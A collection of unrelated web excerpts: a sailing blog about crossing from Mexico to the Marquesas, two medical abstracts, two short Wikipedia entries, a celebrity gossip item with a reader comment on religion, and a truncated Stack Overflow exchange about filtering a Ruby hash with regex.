lines to the runaway boat in an attempt to secure it; not sure where the owners were, possibly on shore. After dinner, Richard and i raised our anchor and started off on our overnight to Baie Hanaiapa on the north shore of Hiva Oa. The yacht club on Baie Hanaiapa, Hiva Oa. The passage was wet. Every squall within the general area it appears made a bee line for our heading and dumped on us copious amounts of water. Sometimes I like this, this time I did not. It seemed cold, and while I know that low 80's is really not cold, it is a relative experience and to me it seemed cold that night so the rain was not really welcomed. Plus we had to motor the whole way so that was no fun. When we finally arrived in the morning, we were both tired and decided to lounge around. Richard dinghied me to shore and I walked for a couple of hours along a road that was heading up into the mountains. Along the way, an elderly gentleman called out and asked if I was coming from a boat to which I replied that i was. He told me to return in about an hour to his "yacht club". I looked around and saw his sign and told him that i would return. When I returned, William Poepoepani told me that he has been inviting cruisers that visit his bay to his house to sign his guest book and asked if I would please sign his book. He offered me cold water and let me look through the three guestbooks he kept. I recognized some of the more recent entries as those of boats that had crossed the Pacific with us and penned an entry for Osprey. On my way out, Mr. Poepoepani offered me several green papayas, watercress and a pamplemousse. To thank him, I gave him a small zip lock bag containing five new barbed fishing hooks which he took and told me he would give to his son who fished the bay to feed his family. I walked back to the boat satisfied that the hooks would be put to good use. Osprey anchored off of Baie Hanaiapa, Hiva Oa. The next day we went to Baie Hanamenu, just a few miles up the coast. The water here was kind of murky and murky waters make me nervous because you wouldn't be able to see sharks if there were any so no snorkeling here. Instead, Richard and I walked to shore and I took a bath in a fresh water stream near the shore. It may have been there that I came into contact with something that the next day made my skin break out in a rash. Lovely.Our sail from Baie Hanamenu on Hiva Oa to Baie d'Hakahua on Oa Pou couldn't have been better. We had between 15 and 25 knots of wind from the right direction with only a moderate swell so we were able to sail on a nice tack the entire way keeping our speed in the mid to upper 6 knot range most of the way. When we arrived in the anchorage, we saw that Kyanos was the only other boat in the Ua Pou "skyline". anchorage. After setting both a bow and stern anchor, we dinghied over to their boat, picked up Ben, and went into town for pizza and beers. After dinner, we returned to our boat and chatted until midnight with Ben. I finally told Ben that I had to dinghy him back to his boat and that Richard and I had to get some sleep as we had gotten up at 5:30 AM to make the crossing from Hiva Oa. And thus ended another perfect day in paradise. Next, we leave for Nuku Hiva where I will upload this post and begin my new post of our time in Nuku Hiva. Stay tuned for photos of my ridiculously AWESOME new tattoo! Tuesday, May 7, 2013 After 35 days of light winds, opposing swell and counter currents, we finally made landfall in Atuona, Hiva Oa in French Polynesia on 05 May 2013. All I can say about that is I am glad to have some terra firma under my feet. Hiva Oa is a beautiful, lush, tropical island with breath taking volcanic mountains with stunning foliage in every direction. We have been here a couple of days and are just now getting our energy back; being a tropical island it is quite humid and very hot pretty much every day. Not complaining, just mentioning.I haven't had a real opportunity to think about my first South Pacific blog but wanted to put up the few posts that I did put together while we were en route from Mexico. These post read in chronological order starting below. Hoping to get the pictures up with the text as well but that might happen in stages. Monday, 08 April 2013, 13:14 UTC 18° 17’ N 114° 28’ W, 12 miles East of Isla Clarion Boat Speed = 3.3 knots, Wind Speed = 10.4 knots from the North Cockpit Temperature = 72° F/22° C Sea Temperature at Location = 84° F/28° C Not all sunrises are colorful. With just about everything crossed off of our to do list, we got ready to leave Mexico on 01 April 2013. Immigration was simple and painless and within less than one half hour we had our zarpe in hand. Bob and Joyce of s/v Chara helped us toss of the docklines and took pictures as we slipped out of Paradise Village Marina and headed towards La Cruz de Huanacaxtle to fill up the diesel tank and our two jerry cans prior to leaving Banderas Bay for the South Pacific. Once topped off, we turned the boat west and entered Banderas Bay. We were able to hoist the sails and soon found ourselves sailing out towards the horizon, taking advantage of the thermal winds that formed in the late afternoons on the bay. The afternoon changed to early evening and we watched the first of many sunsets pass below the bow of Osprey. Our first day out at sea was complete with winds, whales and warm temperatures. The winds began to diminish and the whales disappeared; luckily we still had some warm temperatures (though not as warm as we both had anticipated). After our fourth night out, we decided to stop in at Isla Socorro and drop the anchor for the night. This was a pretty easy decision to make since the island was directly in our intended path and we didn’t have to alter our course that much to make the anchorage. Upon entering the naval harbor, we were in contact with fellow cruisers aboard s/v Kiapa who instructed us to hail the Mexican navy once we were in the protected cove. Unfortunately, our arrival coincided with the arrival of a naval ship and when we tried to hail the navy on the radio, amidst broken Spanish on our part and limited English on their part, the only thing we really understood was the phrase “You are forbidden to be here!”, uttered a couple of times by the Mexican capitania de Puerto. Hearing that message loud and clear, we exited the naval harbor and went around the corner to a small and “somewhat” protected bay where we found s/v Kiapa and s/v Peregrine anchored. As soon as we anchored we were hailed on the radio by Maria on s/v Peregrine asking if we wanted to join the crew on her boat for lunch on Kiapa. Despite being overly tired, Richard and I agreed and were picked up by Irene in Kiapa’s dinghy a couple of hours later along with Maria, Bob, and their crew, Francois (the same Francois who helped me out with the French classes) and made our way to Kiapa. Catamarans were made for entertaining. The main salon of Kiapa is quite spacious with a table set in the port side aft corner. Irene and Lionel of s/v Kiapa had two crew with them, Alan and Elizabeth. Along with the crew of s/v Peregrine and Richard and I, that made nine people, which Kiapa was easily able to accommodate. We had an enjoyable lunch with the other cruisers and Maria even brought out a bottle of champagne so we toasted our early accomplishment of making it several hundred miles offshore. But fatigue soon caught up with Richard and I and we were dinghied back to Osprey for a much needed nap. Later in the afternoon, s/v Cariba showed up and anchored with the rest of us. We had seen Cariba a few months earlier when we were anchored out in Punta de Mita. Approaching Isla Socorro. We only ended up staying the one night as the weather forecast showed winds conducive to making good progress west. As we headed out of the naval harbor, we actually had to check in and out before we left Isla Socorro, we noticed Cariba also leaving the anchorage and after hailing them on the radio, we discovered that we would be sailing together towards our next waypoint. Sidebar regarding s/v Kiapa: We had seen this large, aqua-colored catamaran several times while we were traveling in Mexico. Richard mentioned several times that he thought we had seen this same boat when we were in Hanalei Bay in Kaua’i back in the summer of 2010. Looking at the boat’s home port, I told Richard that the since the boat hailed from Fremantle, Australia, it was unlikely that this was the same boat since we had talked with the owners of the boat while in Hanalei and found out that they were locals from the east side of the island of Kaua’i. Well, as it turns out, Irene and Lionel bought Kiapa in Kaua’I, didn’t change the name and so this was indeed the same catamaran that we had seen a few years back. I was able to dig up some digital pictures of Kiapa in Hanalei Bay and gave them to the new owners. After picking up our anchor and heading away from Isla Socorro, we made our way towards a waypoint that our weather router had provided us with in a report the other day. We were hailed by Cariba and they wanted to know if we had thought about stopping at Isla Clarion on our way southwest. To be honest, we hadn’t really thought about it but the idea of stopping in the middle of the Pacific Ocean just to have lunch had some appeal to it. That said, we made an adjustment to our course and followed Cariba towards Isla Clarion. Isla Clarion. Cariba arrived at the anchorage, Bahia Azufre, at dawn and we were still a few miles to the east. We finally arrived around 10:30 AM local time and dropped our anchor in the bluest water I think I’ve seen to date. As I watched the windlass feed out the chain, I could actually see our anchor as it descended down to about 40 feet where it was eventually consumed by the darker blue of the water. The clouds we had watched gather all morning started to break up but it was still a bit chilly, by our new standards, to actually go into the water. Instead, we decided to sit in the cockpit and relax while watching the waves break forcefully on shore. The island is volcanic in origin and you could see signs of the volcanic soil in the many cones and outcroppings that dotted the landscape. As we were sitting in the cockpit, I noticed a green sea turtle swim by; it was the size of a coffee table! Nothing makes wildlife hide faster or more securely than someone running for a camera so, needless to say, I didn’t get a photo. We could see the crew of Cariba diving off of a volcanic reef on the eastern shore of the island and watched them and a group of about three whales cavorting in the water. The Mexican navy boarded Cariba and spent some time on their boat. When they pulled away from Cariba, I mentioned to Richard that we had better get some fenders out as it looked like the Mexican navy was coming to our boat. As they approached our boat, with somewhat less than the professionalism we have witnessed during other boardings, I overheard the word “cervezas” being thrown around their panga and noticed that the guys were much more interested in watching the female crew from Cariba take off her wetsuit and peel down to her bathing suit, than they were in actually doing any kind of official business at our boat. I guess it was a win-win situation for both Osprey and the Mexican navy that day. After lunch we picked up our anchor and headed away from isla Clarion. We hailed Cariba and let them know what coordinates we were going to be using and mentioned that we would keep in touch by radio. We set our course directly for the Marquesas, on a heading of 212° by the compass; unfortunately, that heading was a bit uncomfortable due to the swells hitting Osprey on the beam, so we corrected the course to optimize speed gained by the good North-Northwest winds (in the 15-20 knots range) and ended up steering a course of about 235° which was still in keeping with out southwest heading. We ended up keeping that heading through the night as the winds ended switching from a North-Northwest direction to a North-Northeast direction. Right now, the headsail is poled out to port and we are running pretty much downwind with a small triangle of the headsail out to stabilize the boat. Not making the fastest time right now, but we are on course and the winds will probably build towards early afternoon and allow us to make a nice run throughout the afternoon and into the early evening with faster speed under the hull. Yesterday, right before the Pacific Puddle Jumpers SSB Net, a booby landed on the boom. It is not uncommon for sea birds to circle the mast of a sailboat numerous times looking for an opportunity to land on the mast. Most of the times, the boat is yawling so much that the birds will circle and approach several times and then eventually give up on the idea. Our booby was a bit more tenacious. After circling the mast several times and finding it untenable to his desires, our booby made an approach to the section of the boom that overhangs the cockpit. I was standing in the cockpit and the booby suddenly came flying towards me with both his feet extended as in a landing position. I should mention that this particular booby was of the “regular” and dusky-colored feet and not that of the much acclaimed blue-footed sub-specie. After several approaches like this, the booby landed on the boom; actually, he landed on the outhaul (the line that is used to unfurl the mailsail out of the mast) and as such, it required much effort on his part to remain upright on the line. Why he didn’t move his feet to the wider and sturdier boom is beyond me; then again, he was a booby. In any event, our booby friend stayed with us for quite some time. We finally evicted him when he shat in the cockpit. I tried to gently nudge him on his way first by unsuccessfully waving my arms in his general direction and then by spraying him with the washdown hose which was also unsuccessful. Seeing that the bird looked like he thought he was put for the night and knowing that one shat is one too many, I retrieved the boathook and attempted to gently assist him in his flight from the boom. This did not go as planned as the booby simply hopped onto the boat hook like it was a perch and there I stood in the heaving cockpit holding a boat hook on which was perched a substantial and determined booby of the “regular” dusky-colored feet sub-specie. Our friend was not pleased about being asked to leave. I called Richard from down below and when he appeared in the companionway, he must have thought that I was practicing some kind of circus act standing there with a booby on the boathook. His expression asked “what are going to do now?” and as I thought about this I considered my options carefully. I decided to count to three (not sure why I did that, as though this gave the booby advance notice of an action about to happen) and then “toss” the booby from the boat hook. This actually worked out quite well; until I noticed the booby making continued circles around the boat and eyeing the boom again. I stood my ground and guarded the boom by meeting the booby on the approach side of the boom and waving my arms in his general direction. This successfully prevented him from landing on the boom; however, in his constant fly-bys, he noticed the unguarded pulpit on the bow and soon I found him perched there. In the end, I decided that cleaning up the bowsprit was an easier task than cleaning booby poop from the canvas in the cockpit or from having to climb the mast and fix whatever instruments he might have damaged if he had successfully landed on the mast. In the end, we learned to live with our booby friend; but the stench of his poop still lingers in the cockpit despite numerous washings with Simple Green. We have added another waypoint to our course to the South Pacific. This one is labeled “ITCZ” which stands for Inter-Tropical Convergence Zone and represents a fluid area that expands and contracts at will, hovering just north of the equator, confining within its boundaries minimal winds and squally conditions. The idea is to cross the ITCZ at its narrowest point thereby minimizing the amount of time spent in the conditions described above. Ideally, crossing the ITCZ at its narrowest point while the ITCZ is flexing/moving north and you are moving south would be the most efficient way to accomplish this, albeit timing this situation which is dependent on many variables is quite the longshot. Most people just look for an opening, hope it’s a narrow part of the ITCZ, turn on the motor and try to plow through it as fast as they can. This scenario is wholly dependent on having conserved enough fuel to motor the hundreds of miles of windless sea that can be expected, even at the narrowest portions. Sunset over the pacific. On a brighter note, all of our fruits and vegetables are holding up quite well so there is no vitamin deficiency or scurvy lurking on our horizons. Meals have been both nutritious and varied; we’ve made stir-fries (with mahi mahi and sierra), curries (with snapper), and beef stew, just to name a few of the meals we’ve had. Richard made a key lime pie last night that we enjoyed after our dealings with the booby. Our fruit supply is dwindling though. I have been making fruit salad for breakfast using the pineapple, cantaloupe, mangoes, and papaya, and I think I have about one more container’s worth of fruit for that. After that, we still have about 20 oranges, 4 grapefruits, several kilos of limes, and some bananas that we are waiting on to ripen. Our vegetables are also holding our nicely. We still have a bunch of potatoes, several heads of broccoli and cabbage, onions, green and red peppers, carrots, celery, tomatoes, lettuce, and garlic that are doing well refrigerated. The freezer is filled with individual portions of chicken, pork, beef, ground beef, hotdogs (I know, but they last indefinitely!), and several kinds of fish (mahi mahi, sierra and snapper), not to mention several containers of egg whites, a frozen banana bread, ice cream, ice cubes, and regular eggs (three eggs, scrambled and portioned into small airtight containers). Richard continues to make bread as we need it, about twice a week, and prior to our leaving Mexico, he made a large quantity of granola. We also made batches of cookies (chocolate chip and ginger snaps) before we left. I had cooked and then portioned out and froze chicken that we use to make chicken salad. Our typical week of lunches includes four days of tuna salad sandwiches, two days of chicken salad sandwiches and one day of peanut butter and jelly sandwiches…at least until that gets boring. When that happens, I may have to get creative with things like hummus, TVP patties (textured vegetable protein…thanks Nicole!), and salads made from anything in the fridge that looks like “it’s about to go”. And there’s always ramen noodles! HA! Yesterday started off with a booby circling the mast looking for an opportunity to land. Once it saw that the boat was yawling too much, it flew away; but not too far, in fact, it seemed preoccupied directly behind the boat…or more precisely, directly on my fishing lure. I suddenly had an image of having to reel in a booby (flashback to my brother Gregg, around 8 or 9 years old, reeling in a pelican in Clearwater Beach, Florida…not a fun scene). The booby kept diving on near my lure so I decided to reel in before it got a chance to gobble down one of my last tuna lures. As I was reeling in, the line felt as though it had some resistance on it but not much and at first I thought it was just the resistance of the lure being pulled through the swells behind the boat. When the terminal end of the line got close enough to the boat, I could clearly see that a small fish was attached and I thought I had caught a flying fish, because that was the only fish I had seen in the water for the past week or so. But no, it wasn’t a flying fish at all; it was the world’s smallest mahi mahi! Yes folks, I finally caught the elusive mahi mahi only to find out that I had “robbed the cradle” and brought in a 10 inch mahi mahi. It was small enough to put in a bowl and keep as a pet. I wasted no time in getting him off of the line and released him into the ocean in the hopes that this would earn me some good karma and a bigger specimen of the same specie would soon jump on my line. Luckily at this point in the trip we are not desperate for fresh fish as the freezer and fridge are still quite full of fresh foods. But the time will come and I hope that we do not regret having released this tiny mahi mahi. Two days ago we were visited by a school of spotted dolphin. There were about 20-30 of them all swimming around the boat. I had gone below to get the video camera and had returned to the bow when all of a sudden Richard yelled, “Fish on!” As I made my way back to the cockpit I arrived just in time to watch as the last of the braided line fed out of the reel and snapped off. At that point I suspected that we might have had a tuna on the line as tuna are known to swim with dolphins and the strike occurred simultaneously with the appearance of the dolphins. Certainly a successful diversion tactic on the fish’s part who now sports some gleaming hardware in the form of a purple and black tuna lure with a hefty hook (I bet all his tuna friends think he looks cool now with his tribal hardware!). Down to my last few expensive tuna lures (don’t want to mention how many I have gone through) and after that it’s back to cheapie spoon lures. At least if I lose those I won’t feel so bad. Nothing else happened over the past few days if you don’t count seeing endless swells streaming past the boat, hundreds of flying fish “flying” through the air, new noises discovered on the boat, spilled containers (due to the rocking and rolling of the boat), and other high seas adventures. A couple of days ago, I caught my first “keeper” mahi mahi; it was 19 inches long which was just long enough to carve out two fillets, which is my new threshold for determining whether or not a fish is worthy of keeping. I have been catching smaller mahi mahis all week and Richard and I have decided that until fresh protein is required, we can be a little picky about which fish we keep; especially since we have been catching fish all week. This guy was quickly filleted and ended up in a sauce of freshly diced tomatoes, onions, garlic and spinach over brown basmati rice…yum! We would have loved to grill the fillets but that is kind of hard when you’re on a passage, especially given the bouncy nature of the boat right now. He made excellent mahi-mahi tacos. We have been visited by more dolphin and I especially kook forward to daytime visits when my fishing line is out. I read somewhere that tuna are frequently found swimming with dolphin and would love to hook into a tuna at this point. There is always room in the fridge and or freezer for freshly caught tuna. Last night, after listening to the Pacific Puddle Jumpers’ net on the single side band radio, I was standing in the cockpit talking to Richard who was down below when all of a sudden I was bombarded by flying squid! It was dark out so at first I didn’t know what had hit me and initially thought it was a single flying fish until I continued to get hit by more squishy little things. Richard turned on the cockpit light and we discovered about 25 small squid lying about in the cockpit. They were only about 2-4 inches long and most of them had ejected their ink so there was quite a mess to clean up; I used a spatula to carefully scoop them up and toss them overboard. I was momentarily tempted to keep some of them for bait but decided against that remembering all the jack crevalle I have in the freezer for bait. For those of you who are unfamiliar with how a radio net works, here’ the gist: Someone volunteers to be the “net controller”. This person is in charge of controlling the flow of “traffic” (conversation) that is relayed during the net. Our particular net is designed to assist boaters who are making the crossing from North America to the South Pacific with the majority of boats having left Mexico and heading towards French Polynesia. The net controller begins the net by asking if there is any “priority or emergency traffic”; this is an opportunity for anyone with a serious issue to get assistance or for anyone who heard a serious call (i.e., “Mayday”) to relay it to the net. After that, the net controller opens the net by stating his/her latitude/longitude, wind speed/direction, and boat speed/direction. The net controller then goes through a “roll call” and calls for a specific boat, asking whether or not that boat is “on frequency” and if it is, to “come now.” If the boat is on frequency, the typical response is, “This is Osprey, how copy?”; “How copy” is simply a way for one boat to ask whether the reception of its transmission is good, light, or unreadable. Sometimes, the net controller can’t get a good copy but another boat in the fleet can hear the called boat better so that boat ends up providing what is called a “relay”, and takes the information from the called boat and relays it to the net controller. Once the information is relayed from the called boat to the net controller, the net controller repeats the information back over the net and asks if the information is correct, which the boat verifies or corrects as needed. Once that boat is finished the net controller “breaks” with the previous boat and goes to the next boat on the roll call and repeats this process until all boats on the roll call have “signed in.” At the end of the roll call, the net controller asks if there is any “traffic”; “traffic” is when one boat wants to talk to another boat. Here’s a sample of what a conversation might sound like: “Is there any traffic for the net, come n ow, over.” “This is Osprey, over.” “Osprey, go ahead with your traffic, over.” “Osprey would like to meet with Cariba after the net on channel 12 alpha, over.” “Cariba, did you copy that, over?” “This is Cariba, copy that, over.” Geeky I know, but it’s kind of cool especially when the net controller goes through about 20-30 boats and you’ve been “watching” these boats make their way southwest from Mexico to the South Pacific for the past few weeks. You definitely get a sense of which boats are the fast ones (we’re not) and which ones are travelling together, etc. It has been fun and provides a little entertainment to break up the day after dinner. Dozens of these guys bombarded the boat...and made a mess! Well, the sun is up and it’s getting warm so I need to go clean the boat after last night’s squid invasion (there is squid ink EVERYWHERE!). So it has been a week since the last time I have written a blog post and honestly, not much has happened. We continue to experience light winds and moderate swells, punctuated by squalls which provide a brief reprieve from the heat and humidity of the day, but usually the squalls occur at night when it is cooler. We are traveling a lot slower than we had hoped and at this rate we are not expecting our landfall in the Marquesas until the beginning of May. As I mentioned, and Richard has blogged about on his blog, we have had exceptionally light winds (in the 2-8 knot range), swells approaching from two directions producing confused seas which in turn makes it harder for the boat to move through the water (further slowing our progress) and a countercurrent that just doesn’t seem to relent. We will occasionally get stronger winds in the 15-20 knots range and think, “Yee ha! Let’s get speed under this boat and put some miles on!” Then you look at the speedometer and see that even though you have 18 knots of wind from a favorable direction, you’re still only doing about 3 knots, which is slow for that much wind. Oh well, it’s only weather and we can’t do anything about it. Oddly enough, there is a sunset every night. So with the prospect of spending more time on the passage to French Polynesia than initially anticipated it’s a good thing that we provisioned for one and one half the amount of time that we thought it would take us to get there; we initially calculated 30 days and multiplied that by 1.5 to arrive at the quantities of food and supplies we would need. Luckily, the fishing hasn’t been too bad. I have caught several mahi mahis along the way and feel as though the fishing is good enough that I don’t have to have my line in the water every day as I’m fairly confident that when I feel it’s time to catch a fish I can usually do so within a day or two. The last mahi mahi I caught was 24 inches from nose to fork in tail and weighted about 10 pounds. I had initially caught this fish and when we got him to the side of the boat, he jumped off of the hook, much to our chagrin. I immediately threw the line back into the water and within 10 minutes I had caught the same fish! This time we were more careful when bringing him on board and he landed right in the cockpit where we wanted him. He was a bloody mess by the time he finished thrashing about and I was able to knock him. I made fish tacos out of him that first night and they were the freshest mahi mahi tacos we had during our entire time in Mexico. There are still some fillets in the freezer that we will take out a cook up soon as well. I won’t go into the disaster that was our engine starter getting toasted due to a suspected short somewhere in the wiring except to say that that was a scary experience. Here you are, literally in the middle of the ocean, with no help for thousands of miles around you and something major and bad happens; despite being a sailboat and us going on and on about wanting to sail the boat rather than motor, you need the motor for essential tasks like motoring into a harbor and charging the batteries (solar doesn’t always do the job). Richard was able to problem solve that one quickly and we worked together to figure out what we needed to do, who was responsible for what and just did it. We ended up trying to heave to for the night but that didn’t seem to work out very well so we just dropped all the sails and literally bobbed around overnight. In the morning, I checked our position and in about 8 hours we had only lost about one mile north and gained four miles west; in the end, the one mile north was considered minor and the four miles west were part of our original course anyways. With the starter replaced, we cranked over the engine and started out on our course again. A couple of days ago, Richard woke me from a nap to point out some pilot whales that were passing close by the boat. We were sailing at the time so we weren’t making much noise which probably accounted for why the whales were so close; and by “so close” I’m actually saying a least 100 feet away. When you are the only object in your entire field of vision and when you look around you, literally do a 360 degree sweep, 100 feet is considered close. And the sun rises every day as well. In addition to the four pilot whales we have also seen tons of flying fish, squid (as described previously), mahi mahi and dolphins. Sometimes at night, before the moon appears in the sky, you can look off the side of the boat and see patches of bioluminescence traveling alongside the boat that are completely different than the type of bioluminescence you see when dolphins show up at night. When dolphins show up at night and stir up the bioluminescence, it looks like old movie torpedoes heading straight towards the boat and then turning at right angles to get to the bow of the boat where the dolphins swim in the bow wave. The dolphins usually swim around the boat, circling back and forth to the bow creating loopy curlicues of bioluminescence in their wakes. This other type of bioluminescence I’ve only seen occasionally and it is different in that it appears to pulsate as it moves along with the boat. It isn’t a long arcing path like the trails behind the dolphins. This is more of a succinct, pulse of bioluminescence. At this point, I’m inclined to believe that this may be larger squid traveling near the surface in a feeding mode. I’ll have to look that up when I get a chance. We’ve also seen a couple of different kinds of pelagic birds out here that I am still trying to identify. Last night we actually saw a fishing boat that came within 2.5 miles of our boat. Since our radio-friends on s/v Cariba zoomed past us a few days out of Isla Clarion (and that was about 10 days ago!), we haven’t seen any other vessels out here. You can imagine the excitement then of seeing a boat so close in the middle of the ocean. keeping our eyes peeled for ANY vessels near us. Yesterday the swells seemed to flatten out and the ocean actually looked like a dessert, at least to me it did. The surface looked like windblown sand and everything also looked smooth as opposed to the pointy waves that typically characterize the ocean. That only lasted one day and it’s just too bad that we didn’t have winds of say, 15-20 knots out of the east and lost the countercurrent because if all those variables had come into play at the same time we would have had a wonderful day of sailing and making great progress towards our goal; which still stands at over one thousand miles away. Well, a lot has happened since the last time I updated this post. WE have definitely transited the Inter Tropical Convergence Zone (ITCZ) as we are pretty much no longer plagued by the light winds as described above. The winds have shifted from the southeast to the east as we are definitely in the trade winds that we have been anticipating since getting out of the ITCZ; additionally, the winds are a bit stronger ranging from 12 to 20 at times which is a vast improvement and allows us to make considerable headway towards the South Pacific. We crossed the equator on 27 April 2013 at around 3:00 PM local Pacific Daylight Time (we decided to leave the clocks on the boat on PDT until we make landfall in the Marquesas, so when I mention local time, at this point, it refers to Seattle time). To mark our becoming “shellbacks”, Richard and I donned silly outfits complete with mardi gras beads, silly hats and capes, I made a fudge marble cake (gotta love boxed cake mixes sometimes) and we opened Mexican bottles of beer to mark the occasion. We offered the obligatory cake and libations to Neptune, and as Captain, Richard made a speech about our thanks to Neptune and asked for favorable conditions to continue. I shook up and opened a Pacifico beer to help Neptune wash down the chocolate cake. Nothing says celebrate quite like chocolate cake and Bohemia beers in the middle of the Pacific Ocean. My only disappointment was that there wasn’t a red line marking the equator like in all those Bugs Bunny cartoons I grew up on. Two days ago I hooked into a really fighting fish and battle this bad boy for a good 15-20 minutes, getting him to the boat and decided to let him tire himself out (and allow myself to rest a bit) before attempting to haul him over the lifelines and into the cockpit. As I was waiting, with plenty of tension on the line, he was overcome by a swell of adrenaline and started thrashing about, ultimately shaking loose the hook and swimming away. Needless to say I was immensely…dare I say it?, yes I will…pissed! I had hooked into a very decent sized yellowtail tuna (the length is currently under debate as I tend to exaggerate in one direction while I believe Richard exaggerates in the other), somewhere between 2 and 4 feet in length, and struggled with him for quite a while. When he jumped off, I swore and then immediately threw my hook back in the water hoping to fool him again into taking the bait but either he had wised up to the situation or was just plain ol’ sore from the tremendous fight he had just engaged in with me. That tuna was going to taste soooo good too, I could just tell. Oh well, next time. With less than 300 miles to go the excitement on Osprey is definitely mounting. We expect to arrive on Saturday, 04 May 2013, sometime in the afternoon. The immigration office will likely be closed but Richard has been in communication with our hired agent and was told that we can drop our anchor in the bay at Atuona on Hiva Oa, raise our pratique flag (otherwise known as the “Q” flag or quarantine flag) and enjoy the weekend in Atuona before completing customs on Monday. This will actually give us a couple extra days in the country as our visas are only for 90 days and cover the Marquesas, the Tuamotos, and Society Islands (Tahiti, Bora Bora, etc.). It’ll just be nice to stop the boat for the first time in over a month and take the dinghy to shore to walk around on terra firma; I am anxiously awaiting peeing without having to aim at a moving target! The boat needs a good cleaning as do Richard and myself, and I’m sure we’ll run into other “radio buddies” we’ve been hearing on the Pacific Puddle Jumpers’ Net while anchored in Hiva Oa. Our arrival in French Polynesia also marks the beginning of you, the readers, having to get used to reading some pretty strange names of places. I’ve been looking at our guides books and while there is a bit of French peppered into some of the names in French Polynesia, most of the names still carry the hallmark of Polynesian languages which are characterized by lots of vowels and a paucity of consonants (Can you see a Polynesian version of Wheel of Fortune…I’d like to buy an “A”…as Vanna White moves in to turn 47 A’s. Care to solve the puzzle?). The thing I learned about this language from our experience in Hawai’i, is that every letter, especially every vowel, is pronounced, even if the name is just four vowels (the island of Eiao in the Marquesas, being an example). Have fun!
{ "pile_set_name": "Pile-CC" }
Optical imaging of vascular and metabolic responses in the lumbar spinal cord after T10 transection in rats. Neuronal and vascular reorganization after spinal cord injury (SCI) is scarcely known although its characterization has major implications in understanding the functioning of the altered spinal cord. Several electrophysiological and anatomical lines of evidence support plasticity caudal to the lesion site, but do not provide sufficient clues about neuronal and vascular reorganization after SCI. The aim of the present study was to compare neuronal activation in the lumbar spinal cord between uninjured and SCI rats with novel optical imaging technology. The results showed significant haemodynamic response differences after sciatic nerve stimulation in uninjured controls, in comparison to SCI rats. Both timing and shape of the response were modified. In uninjured rats, blood flow presented an initial dip but was rapidly drained from the activation site through the venous system. In comparison, the blood transfer rate in SCI rats was much slower. Damaged blood vessels at the lesion site after thoracic SCI impacted the vascular response upon neuronal activation in the lumbar spinal cord. This observation is important in the study of spinal cord function after SCI by imaging techniques based on haemodynamics (blood oxygenation level-dependent using functional magnetic resonance imaging (BOLD fMRI) and optical imaging). In conclusion, our results indicate that new avenues quantifying the influence of vascular plumbing will have to be developed to explore the efficacy of rehabilitation and pharmacological therapies by haemodynamic imaging.
{ "pile_set_name": "PubMed Abstracts" }
Konstantinogradovka Konstantinogradovka () is a rural locality (a selo) in Konstantinogradovsky Selsoviet of Ivanovsky District, Amur Oblast, Russia. The population was 525 as of 2018. There are 6 streets. Geography The village is located near the right bank of the Kozlovka River, 26 km north-east from Ivanovka. References Category:Rural localities in Amur Oblast
{ "pile_set_name": "Wikipedia (en)" }
Travel Medicine Online International sources of travel medicine information on the Internet for travellers. Access to global information through the Internet is the domain of travellers as much as travel health practitioners. It is important in travel medicine practice for travel health practitioners to be aware of some of the sites that travellers may visit for travel health information or possibly even referred to for further information. It is important that travel health practitioners can guide travellers as to the most reliable sites and what information may be useful. Travellers will be attracted to major national Internet sites on travel health, but also possibly to popular travel industry sites. Access to search engines on the Internet also makes searching for travel health information much easier for travellers.
{ "pile_set_name": "PubMed Abstracts" }
Open Letter (To a Landlord) "Open Letter (To a Landlord)" is the third single released by Living Colour. It is from their 1988 debut album Vivid. The song reached #82 on the Billboard Hot 100. Track listings 7" single "Open Letter (To a Landlord)" — 5:30 "Cult of Personality" (Live) — 5:06 12" single "Open Letter (To a Landlord)" — 5:30 "Cult of Personality" (Live) — 5:06 "Talkin' 'Bout a Revolution" — 4:29 Charts References Category:Living Colour songs Category:1988 singles Category:Protest songs Category:Songs written by Vernon Reid Category:Song recordings produced by Ed Stasium Category:1988 songs Category:Epic Records singles Category:Songs about landlords
{ "pile_set_name": "Wikipedia (en)" }
Tuesday, January 30, 2007 Michael Jackson is considering converting to Islam, after his brother Jermaine convinced him the religion will change his life for the better.Jermaine credits his faith with helping him cope on British reality show Celebrity Big Brother. The 52-year-old says, "If I didn't have Allah and my prayer rug, I would not have survived, and the reason why is because it kept me focused, it kept me calm. "Michael, I feel, needs to become a Muslim because I think it's a great protection for him from all the things that he's been attacked with, which are false. There's a strength and a protection there. "I brought him a lot of books, and he reads everything and he reads a lot. "I think he's probably given it serious thought because he's spent a lot of time in Bahrain. I was the reason why he had gone there because I wanted him to get out of America and just go somewhere peaceful and quiet, where people pray five times a day. It's a beautiful thing." It was said that Jackson was a Jehova Witness snd this is a false religion.Islam is the same - there is no allah and the Koran is contradiction all over.Christianity is the only true religion- it is a personal relationship with Jesus Christ.
{ "pile_set_name": "Pile-CC" }
Q: Ruby regex selecting multiple words at the same time I have a hash that I am using regex on to select what key/value pairs I want. Here is the method I have written: def extract_gender_race_totals(gender, race) totals = @data.select {|k,v| k.to_s.match(/(#{gender})(#{race})/)} temp = 0 totals.each {|key, value| temp += value} temp end the hash looks like this: @data = { :number_of_african_male_senior_managers=>2, :number_of_coloured_male_senior_managers=>0, :number_of_indian_male_senior_managers=>0, :number_of_white_male_senior_managers=>0, :number_of_african_female_senior_managers=>0, :number_of_coloured_female_senior_managers=>0, :number_of_indian_female_senior_managers=>0, :number_of_white_female_senior_managers=>0, :number_of_african_male_middle_managers=>2, :number_of_coloured_male_middle_managers=>0, :number_of_indian_male_middle_managers=>0, :number_of_white_male_middle_managers=>0, :number_of_african_female_middle_managers=>0, :number_of_coloured_female_middle_managers=>0, :number_of_indian_female_middle_managers=>0, :number_of_white_female_middle_managers=>0, :number_of_african_male_junior_managers=>0, :number_of_coloured_male_junior_managers=>0, :number_of_indian_male_junior_managers=>0, :number_of_white_male_junior_managers=>0, :number_of_african_female_junior_managers=>0, :number_of_coloured_female_junior_managers=>0, :number_of_indian_female_junior_managers=>0, :number_of_white_female_junior_managers=>0 } but it's re-populated with data after a SQL Query. I would like to make it so that the key must contain both the race and the gender in order for it to return something. Otherwise it must return 0. Is this right or is the regex syntax off? It's returning 0 for all, which it shouldn't. So the example would be %td.total_cell= @ee_demographics_presenter.extract_gender_race_totals("male","african") This would return 4, there are 4 African, male managers. A: Try something like this. def extract_gender_race_totals(gender, race) @data.select{|k, v| k.to_s.match(/#{race}_#{gender}/)}.values.reduce(:+) end extract_gender_race_totals("male", "african") # => 4 A: gmalete's answer gives an elegant solution, but here is just an explanation of why your regexp isn't quite right. If you corrected the regexp I think your approach would work, it just 